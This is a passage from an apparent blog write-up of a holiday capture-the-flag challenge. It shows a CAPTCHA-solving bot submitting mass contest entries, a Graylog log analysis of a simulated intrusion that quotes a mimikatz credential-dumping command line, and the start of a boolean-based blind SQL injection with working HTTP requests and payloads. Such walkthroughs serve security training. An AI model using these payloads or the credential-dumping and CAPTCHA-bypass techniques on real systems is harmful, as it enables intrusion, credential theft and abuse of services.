    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;img&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, this means that our CAPTEHA images do not have a transparent background
anymore, whereas the catalogue images we used to train our model did. This
might make our Machine Learning model a little bit unreliable. We could modify
our catalogue images to remove the alpha channel, and retrain our model. I
opted to try with my initial model, because I was to impatient to train another
model.&lt;/p&gt;
&lt;p&gt;Sure enough, my model was not the most precise, and I had to try a couple of
times. But after four or five tries, my script correctly solved the CAPTEHA:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./capteha_api.py
&lt;span class="go"&gt;INFO: Initialized TensorFlow Lite runtime.&lt;/span&gt;
&lt;span class="go"&gt;CAPTEHA Solved!&lt;/span&gt;
&lt;span class="go"&gt;Submitting lots of entries until we win the contest! Entry #1&lt;/span&gt;
&lt;span class="go"&gt;Submitting lots of entries until we win the contest! Entry #2&lt;/span&gt;
&lt;span class="go"&gt;Submitting lots of entries until we win the contest! Entry #3&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;Submitting lots of entries until we win the contest! Entry #103&lt;/span&gt;
&lt;span class="go"&gt;Submitting lots of entries until we win the contest! Entry #104&lt;/span&gt;
&lt;span class="go"&gt;{&amp;quot;data&amp;quot;:&amp;quot;&amp;lt;h2 id=\&amp;quot;result_header\&amp;quot;&amp;gt; Entries for email address [REDACTED] no longer accepted as our systems show your email was already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to arrive in your inbox or check your spam filter settings. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Congratulations and Happy Holidays!&amp;lt;/h2&amp;gt;&amp;quot;,&amp;quot;request&amp;quot;:true}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Few seconds later, I receive an email:&lt;/p&gt;
&lt;img alt="frido_sleigh_mail.png" class="align-center" src="/images/sans-christmas-challenge-2019/frido_sleigh_mail.png" /&gt;
&lt;p&gt;We managed to win the contest for Krampus!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-9"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id31"&gt;Objective 9:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="pepper-minstix-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id32"&gt;Pepper Minstix's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We must take a look at logs in Graylog to find weird events and answer
questions.&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Minty CandyCane reported some weird activity on his computer after he
clicked on a link in Firefox for a cookie recipe and downloaded a file. What
is the full-path + filename of the first malicious file downloaded by Minty?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let's search events with &lt;code&gt;UserAccount:minty&lt;/code&gt;. Luckily, one of the &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=UserAccount%3Aminty"&gt;first
results&lt;/a&gt;
looks like a malicious file, &lt;code&gt;C:\Users\minty\Downloads\cookie_recipe.exe&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;The malicious file downloaded and executed by Minty gave the attacker remote
access to his machine. What was the &lt;strong&gt;ip:port&lt;/strong&gt; the malicious file connected
to first?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, we can look for &lt;code&gt;cookie_recipe.exe&lt;/code&gt; and events with a
&lt;code&gt;DestinationIp&lt;/code&gt; attribute. &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=cookie_recipe.exe%20AND%20UserAccount%3Aminty%20AND%20_exists_%3ADestinationIp"&gt;This query&lt;/a&gt;
has only one result. The &lt;code&gt;ip:port&lt;/code&gt; is &lt;code&gt;192.168.247.175:4444&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;What was the first command executed by the attacker?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If we keep looking for &lt;code&gt;cookie_recipe.exe&lt;/code&gt;, we can &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=cookie_recipe.exe"&gt;see&lt;/a&gt; the commands launched by the
attacker. The first one is &lt;code&gt;whoami&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;What is the one-word service name the attacker used to escalate privileges?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Still looking at &lt;code&gt;cookie_recipe.exe&lt;/code&gt;, we see the interaction with a
Windows service with the &lt;code&gt;sc&lt;/code&gt; command. The service is called
&lt;code&gt;webexservice&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;What is the file-path + filename of the binary ran by the attacker to dump credentials?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If we take a look at the &lt;code&gt;webexservice&lt;/code&gt; service, we can
&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=webexservice"&gt;see&lt;/a&gt;
the creation of another executable, &lt;code&gt;cookie_recipe2.exe&lt;/code&gt;. Let's look for
this executable. The
&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=cookie_recipe2.exe"&gt;results&lt;/a&gt;
show that the attacker downloaded &lt;code&gt;mimikatz&lt;/code&gt; from &lt;a class="reference external" href="https://github.com/gentilkiwi"&gt;gentilkiwi's GitHub
repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's look for &lt;code&gt;mimikatz&lt;/code&gt;. The
&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=mimikatz"&gt;results&lt;/a&gt;
show that a command line &lt;code&gt;&amp;quot;C:\cookie.exe&amp;quot; privilege::debug sekurlsa::logonpasswords exit&lt;/code&gt;
was launched. The &lt;code&gt;mimikatz&lt;/code&gt; executable was therefore saved under
&lt;code&gt;C:\cookie.exe&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;The attacker pivoted to another workstation using credentials gained from
Minty's computer. Which account name was used to pivot to another machine?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, we know the attacker's IP is &lt;code&gt;192.168.247.175&lt;/code&gt;. We also know from
the analysis of the password spraying attack, that the Event ID for a correct
authentication is 4624. Let's look for this Event ID, tied to this IP address.
The
&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=source%2CCommandLine%2CLogonType%2Cmessage&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=EventID%3A4624%20AND%20192.168.247.175"&gt;results&lt;/a&gt;
all have the same &lt;code&gt;AccountName&lt;/code&gt; attribute, &lt;code&gt;alabaster&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection
to another machine?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, I had a hard time answering this one. I &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=DestinationPort%3A3389"&gt;looked for events&lt;/a&gt;
with &lt;code&gt;DestinationPort:3389&lt;/code&gt;, and submitted the four different timestamps.
However, they were not the correct one. I thought that maybe I should submit
them with their UTC value, but to no avail.&lt;/p&gt;
&lt;p&gt;I then tried bruteforcing every value between &lt;code&gt;05:59:00&lt;/code&gt; and
&lt;code&gt;06:02:00&lt;/code&gt;, but it was also a fail.&lt;/p&gt;
&lt;p&gt;Finally, I manually tried every timestamp for the query &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=EventID%3A4624%20AND%20DestinationHostname%3Aelfu%5C-res%5C-wks2"&gt;EventID:4624 AND
DestinationHostname:&amp;quot;elfu-res-wks2&amp;quot;&lt;/a&gt;
after &lt;code&gt;05:59:00&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Turns out the correct one is &lt;code&gt;06:04:28&lt;/code&gt;. After inputing the correct
answer, the report tells you:&lt;/p&gt;
&lt;blockquote&gt;
LogonType 10 is used for successful network connections using the RDP
client.&lt;/blockquote&gt;
&lt;p&gt;So, I guess I should have looked for &lt;code&gt;LogonType:10&lt;/code&gt;, which indicates that
the connection is fully complete, whereas my first four timestamps were just
the establishment of the TCP connection.&lt;/p&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;The attacker navigates the file system of a third host using their Remote
Desktop Connection to the second host. What is the &lt;strong&gt;SourceHostName,DestinationHostname,LogonType&lt;/strong&gt;
of this connection?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, we know that the second host is &lt;code&gt;elfu-res-wks2&lt;/code&gt;. If we keep looking
for Event ID 4624 with this &lt;code&gt;SourceHostName&lt;/code&gt;, we
&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=SourceHostName%3A%22ELFU-RES-WKS2%22%20AND%20EventID%3A4624"&gt;find&lt;/a&gt;
two values for &lt;code&gt;DestinationHostname&lt;/code&gt;: &lt;code&gt;elfu-res-wks2&lt;/code&gt; (our
original workstation) or &lt;code&gt;elfu-res-wks3&lt;/code&gt;. The latter must be our third
host.&lt;/p&gt;
&lt;p&gt;Let's add &lt;code&gt;DestinationHostname=&amp;quot;elfu-res-wks3&amp;quot;&lt;/code&gt; to our previous query to
see the possible value for &lt;code&gt;LogonType&lt;/code&gt;. We
&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=SourceHostName%3A%22ELFU-RES-WKS2%22%20AND%20EventID%3A4624%20AND%20DestinationHostname%3A%22elfu-res-wks3%22"&gt;find&lt;/a&gt;
that the onlye &lt;code&gt;LogonType&lt;/code&gt; is &lt;code&gt;3&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Therefore, the CSV result is &lt;code&gt;elfu-res-wks2,elfu-res-wks3,3&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;What is the full-path + filename of the secret research document after being
transferred from the third host to the second host?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, we can specify a &lt;code&gt;source=&amp;quot;elfu-res-wks2&amp;quot;&lt;/code&gt; and look for file
creation. &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=source%3D%22elfu-res-wks2%22%20AND%20_exists_%3ATargetFilename"&gt;This query&lt;/a&gt;
returns a few results. By looking through it, we can find the file
&lt;code&gt;C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;What is the IPv4 address (as found in logs) the secret research document
was exfiltrated to?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;If we &lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=super_secret_elfu_research.pdf"&gt;look for this file name&lt;/a&gt;,
we can see that the file was exfiltraded to pastebin.com, via a PowerShell
command, with a PID of 1232. Let's look for this PID, and list the different
&lt;code&gt;DestinationIp&lt;/code&gt; it communicated with.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://graylog.elfu.org/streams/000000000000000000000001/search?rangetype=relative&amp;amp;fields=message%2Csource&amp;amp;width=1853&amp;amp;highlightMessage=&amp;amp;relative=0&amp;amp;q=ProcessId%3A1232%20AND%20_exists_%3ADestinationIp"&gt;This query&lt;/a&gt;
gives us only one IP address: &lt;code&gt;104.22.3.84&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now that we have answered every question, we get the following message:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Incident Response Report #7830984301576234 Submitted.&lt;/p&gt;
&lt;p&gt;Incident Fully Detected!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="retrieve-scraps-of-paper-from-server"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id33"&gt;Retrieve Scraps of Paper from Server&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Krampus is super happy that we managed to win the Frido Sleigh contest for him!&lt;/p&gt;
&lt;img alt="krampus.png" class="align-center" src="/images/sans-christmas-challenge-2019/small_krampus.png" /&gt;
&lt;p&gt;&lt;em&gt;Krampus says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You did it! Thank you so much. I can trust you!&lt;/p&gt;
&lt;p&gt;To help you, I have flashed the firmware in your badge to unlock a useful
new feature: magical teleportation through the steam tunnels.&lt;/p&gt;
&lt;p&gt;As for those scraps of paper, I scanned those and put the images on my
server.&lt;/p&gt;
&lt;p&gt;I then threw the paper away.&lt;/p&gt;
&lt;p&gt;Unfortunately, I managed to lock out my account on the server.&lt;/p&gt;
&lt;p&gt;Hey! You’ve got some great skills. Would you please hack into my system and
retrieve the scans?&lt;/p&gt;
&lt;p&gt;I give you permission to hack into it, solving Objective 9 in your badge.&lt;/p&gt;
&lt;p&gt;And, as long as you're traveling around, be sure to solve any other
challenges you happen across.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we must hack Krampus' system to recover the scraps of paper. Let's head
over to the &lt;a class="reference external" href="https://studentportal.elfu.org/"&gt;Student Portal&lt;/a&gt; and see what
we can do.&lt;/p&gt;
&lt;p&gt;The portal presents the university, the different elvish students, and the
application process. It's possible to &lt;a class="reference external" href="https://studentportal.elfu.org/apply.php"&gt;send an application&lt;/a&gt;
and &lt;a class="reference external" href="https://studentportal.elfu.org/check.php"&gt;check our application's status&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's see what we can do on these pages:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/validator.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;studentportal.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;89&lt;/span&gt;

MTAwOTkwNTY5MjE2MTU3Nzk3NzY0NDEwMDk5MDU2OS4yMTY=_MTI5MjY3OTI4NTk2NDgzMjMxNjk4MjE0LjkxMg==
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/application-check.php?elfmail=test@test.com&amp;#39;&amp;amp;token=MTAwOTkwNTY5MjE2MTU3Nzk3NzY0NDEwMDk5MDU2OS4yMTY%3D_MTI5MjY3OTI4NTk2NDgzMjMxNjk4MjE0LjkxMg%3D%3D&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;studentportal.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;2927&lt;/span&gt;

[...]
&lt;span class="hll"&gt;Error: SELECT status FROM applications WHERE elfmail = &amp;#39;test@test.com&amp;#39;&amp;#39;;&amp;lt;br&amp;gt;You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &amp;#39;&amp;#39;test@test.fr&amp;#39;&amp;#39;&amp;#39; at line 1
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Couple of interesting things:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;First, we can see that before every submission to the form, a call is made to
&lt;a class="reference external" href="https://studentportal.elfu.org/validator.php"&gt;https://studentportal.elfu.org/validator.php&lt;/a&gt; to get a validation token, that
must be sent to the &lt;a class="reference external" href="https://studentportal.elfu.org/application-check.php"&gt;https://studentportal.elfu.org/application-check.php&lt;/a&gt; URL.&lt;/li&gt;
&lt;li&gt;Second, we have a SQL injection! What's more, the error message is pretty
chatty, and gives us the complete SQL statement:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;applications&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;elfmail&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;user_input_goes_here&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can use this SQL injection to dump the content of the database. However,
this does not look to be a &lt;a class="reference external" href="http://www.sqlinjection.net/union/"&gt;UNION-exploitable SQL injection&lt;/a&gt;.
However, it seems that it could be a &lt;a class="reference external" href="https://www.owasp.org/index.php/Blind_SQL_Injection"&gt;boolean-based blin SQL injection&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's say we use this as our user input:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
garbage&amp;#64;garbage.com' OR '1'='1
&lt;/pre&gt;
&lt;p&gt;The SQL statement becomes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;applications&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;elfmail&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;garbage@garbage.com&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;WHERE&lt;/code&gt; part of the statement will always be true, because of the
&lt;code&gt;OR '1'='1'&lt;/code&gt; part. So, it will return the status of the first
application, which is still pending:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/application-check.php?elfmail=garbage%40garbage.com&amp;#39;+OR+&amp;#39;1&amp;#39;%3d&amp;#39;1&amp;amp;token=MTAwOTkwNjMxMTY4MTU3Nzk3ODYxMjEwMDk5MDYzMS4xNjg%3D_MTI5MjY4MDA3ODk1MDQzMjMxNzAwMTk3LjM3Ng%3D%3D&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;studentportal.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;2723&lt;/span&gt;

[...]
Your application is still pending!
[...]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, if we use this as our user input:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
garbage&amp;#64;garbage.com' OR '1'='0
&lt;/pre&gt;
&lt;p&gt;The SQL statement becomes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;applications&lt;/span&gt; &lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;elfmail&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;garbage@garbage.com&amp;#39;&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;0&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, the &lt;code&gt;OR&lt;/code&gt; clause in our &lt;code&gt;WHERE&lt;/code&gt; statement is always false
(because 1 is never equal to 0). So the statement will return the status for
our email address &lt;code&gt;garbage&amp;#64;garbage.com&lt;/code&gt;, which does not exist in the
database. Therefore, our application is not found:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/application-check.php?elfmail=garbage%40garbage.com&amp;#39;+OR+&amp;#39;1&amp;#39;%3d&amp;#39;0&amp;amp;token=MTAwOTkwNjMzOTg0MTU3Nzk3ODY1NjEwMDk5MDYzMy45ODQ%3D_MTI5MjY4MDExNDk5NTIzMjMxNzAwMjg3LjQ4OA%3D%3D&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;studentportal.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;2710&lt;/span&gt;

[...]
No application found!
[...]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have a way to evaluate boolean statements. If our statement is true,
the server will return &amp;quot;Your application is still pending!&amp;quot;. If it's false, it
will return &amp;quot;No application found!&amp;quot;.&lt;/p&gt;
&lt;p&gt;Let's say we want to find the first letter of the current database. We can
input:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
garbage&amp;#64;garbage.com' OR (SELECT MID(DATABASE(),0,1))='a
&lt;/pre&gt;
&lt;p&gt;If the first letter is &lt;code&gt;a&lt;/code&gt;, the server will answer &amp;quot;Your application is
still pending!&amp;quot;. If not, it will answer &amp;quot;No application found!&amp;quot;:&lt;/p&gt;
